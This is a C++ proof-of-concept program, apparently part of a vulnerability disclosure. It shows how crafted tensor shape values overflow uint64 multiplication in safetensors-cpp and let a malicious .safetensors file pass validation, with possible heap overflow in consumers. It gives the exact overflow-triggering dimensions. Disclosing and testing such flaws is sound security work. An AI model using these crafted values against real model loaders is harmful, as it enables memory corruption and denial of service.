rez0's picture
Upload folder using huggingface_hub
4c19aea verified
/**
* test_overflow.cc - Demonstrates integer overflow vulnerability in safetensors-cpp
*
* This program loads a malicious .safetensors file where shape dimensions
* are crafted to overflow uint64 multiplication in get_shape_size().
*
* The file passes safetensors-cpp validation because:
* shape = [4194305, 4194305, 211106198978564]
* get_shape_size() = 4194305 * 4194305 * 211106198978564 (overflows to 4)
* tensor_size = 4 * sizeof(F32) = 16 bytes
* data_offsets = [0, 16] -> data_size = 16 bytes
* tensor_size == data_size -> VALIDATION PASSES
*
* But the declared shape claims ~3.7 * 10^27 elements.
*
* IMPACT: Any code that trusts the shape for buffer allocation or iteration
* will either:
* (a) Attempt a massive allocation (DoS / OOM)
* (b) If they also overflow, allocate a tiny buffer and write OOB (heap overflow)
* (c) Iterate over wrong number of elements, causing OOB reads
*
* Compile: g++ -std=c++17 -I safetensors-cpp -o test_overflow test_overflow.cc
*/
#include <cstdio>
#include <cstdint>
#include <cstdlib>
#include <cstring>
#include <fstream>
#include <vector>
#include <iostream>
#include <limits>
#include "safetensors.hh"
int main(int argc, char *argv[]) {
const char *filepath = "overflow_tensor.safetensors";
if (argc > 1) {
filepath = argv[1];
}
printf("=== safetensors-cpp Integer Overflow PoC ===\n\n");
// Read file into memory
std::ifstream ifs(filepath, std::ios::binary | std::ios::ate);
if (!ifs.is_open()) {
fprintf(stderr, "Failed to open %s\n", filepath);
return 1;
}
size_t filesize = ifs.tellg();
ifs.seekg(0);
std::vector<uint8_t> data(filesize);
ifs.read(reinterpret_cast<char*>(data.data()), filesize);
ifs.close();
printf("[*] Loaded file: %s (%zu bytes)\n", filepath, filesize);
// Parse with safetensors-cpp
safetensors::safetensors_t st;
std::string warn, err;
bool ok = safetensors::load_from_memory(data.data(), data.size(),
filepath, &st, &warn, &err);
if (!ok) {
printf("[!] load_from_memory FAILED: %s\n", err.c_str());
return 1;
}
if (!warn.empty()) {
printf("[!] Warnings: %s\n", warn.c_str());
}
printf("[+] load_from_memory SUCCEEDED (file parsed without error)\n\n");
// Validate data offsets (this is the check that should catch overflow)
std::string val_err;
bool valid = safetensors::validate_data_offsets(st, val_err);
printf("[*] validate_data_offsets: %s\n", valid ? "PASSED" : "FAILED");
if (!valid) {
printf(" Error: %s\n", val_err.c_str());
}
// Examine the tensor
for (size_t i = 0; i < st.tensors.size(); i++) {
std::string key = st.tensors.keys()[i];
safetensors::tensor_t tensor;
st.tensors.at(i, &tensor);
printf("\n[*] Tensor: '%s'\n", key.c_str());
printf(" dtype: F32\n");
printf(" shape: [");
for (size_t j = 0; j < tensor.shape.size(); j++) {
if (j > 0) printf(", ");
printf("%zu", tensor.shape[j]);
}
printf("]\n");
printf(" data_offsets: [%zu, %zu]\n", tensor.data_offsets[0], tensor.data_offsets[1]);
// Show the overflow
size_t shape_size = safetensors::get_shape_size(tensor);
size_t dtype_bytes = safetensors::get_dtype_bytes(tensor.dtype);
size_t tensor_size = dtype_bytes * shape_size;
printf("\n [OVERFLOW ANALYSIS]\n");
printf(" get_shape_size() = %zu (OVERFLOWED! True value: ~3.7e27)\n", shape_size);
printf(" get_dtype_bytes() = %zu\n", dtype_bytes);
printf(" tensor_size = %zu * %zu = %zu\n", dtype_bytes, shape_size, tensor_size);
printf(" data_size = %zu\n", tensor.data_offsets[1] - tensor.data_offsets[0]);
printf(" tensor_size == data_size? %s\n",
tensor_size == (tensor.data_offsets[1] - tensor.data_offsets[0]) ? "YES (validation passes!)" : "NO");
// Demonstrate the danger: a naive consumer trusting shape
printf("\n [IMPACT DEMONSTRATION]\n");
printf(" A consumer that trusts shape dimensions would compute:\n");
printf(" shape[0] * shape[1] * shape[2] = ");
// Use __int128 or manual check to show the true product
__uint128_t true_product = (__uint128_t)tensor.shape[0] * tensor.shape[1] * tensor.shape[2];
printf("OVERFLOW (too large for uint64)\n");
printf(" True product > UINT64_MAX: %s\n",
true_product > ((__uint128_t)UINT64_MAX) ? "YES" : "NO");
// Simulate what a consumer would do
printf("\n [SIMULATED CONSUMER BEHAVIOR]\n");
// Scenario 1: Consumer uses shape for allocation (overflows to small buffer)
size_t alloc_size = 1;
for (size_t j = 0; j < tensor.shape.size(); j++) {
alloc_size *= tensor.shape[j]; // Same overflow!
}
alloc_size *= dtype_bytes;
printf(" Consumer alloc (overflowed): %zu bytes (tiny!)\n", alloc_size);
printf(" Consumer thinks tensor has: %zu * %zu * %zu = ~3.7e27 elements\n",
tensor.shape[0], tensor.shape[1], tensor.shape[2]);
// Show it: allocate the overflowed-size buffer, then show what happens
// when iterating over shape dimensions
printf("\n If consumer allocates %zu bytes but iterates shape[0]*shape[1]*shape[2] times:\n", alloc_size);
printf(" -> HEAP BUFFER OVERFLOW (writing ~3.7e27 * 4 bytes into %zu byte buffer)\n", alloc_size);
printf(" This is a critical memory safety vulnerability.\n");
}
printf("\n=== DIFFERENTIAL RESULT ===\n");
printf(" Rust (reference): REJECTS file with SafeTensorError::ValidationOverflow\n");
printf(" C++ (safetensors-cpp): ACCEPTS file, validation passes\n");
printf(" Impact: A model file that Rust deems invalid is accepted by C++\n");
printf(" The shape values cause integer overflow, enabling heap corruption\n");
return 0;
}